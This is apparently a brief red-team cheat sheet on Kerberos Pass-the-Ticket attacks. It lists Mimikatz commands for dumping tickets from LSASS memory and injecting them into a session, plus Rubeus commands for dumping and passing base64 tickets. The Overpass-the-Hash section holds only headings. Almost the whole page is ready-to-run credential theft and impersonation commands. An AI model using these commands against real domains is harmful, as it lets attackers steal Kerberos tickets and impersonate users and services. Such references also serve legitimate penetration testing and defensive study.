Kerberos
Pass The Ticket
Mimikatz
# Tickets can be extracted from lsass memory using the following command
sekurlsa::tickets /export
# On linux, it the keys are located in files. Location of these files can be found in the kerberos configuration files: `/etc/krb5.conf`.
# Inject ticket to current session:
kerberos::ptt <ticket_id>
# This purges the current tickets from memory and injects the specified ticketsRubeus
.\Rubeus.exe dump # Dumps the tickets
# Dumps all ticket when run with elevated privilege
.\Rubeus.exe /nowrap # dumps ticket with no new lines
.\Rubeus.exe /service:krbtgt # specify service
# Using the ticket
.\Rubeus.exe ptt /ticket:<base64ticket> Overpass The Hash/Pass The Key
Mimikatz
Rubeus
Last updated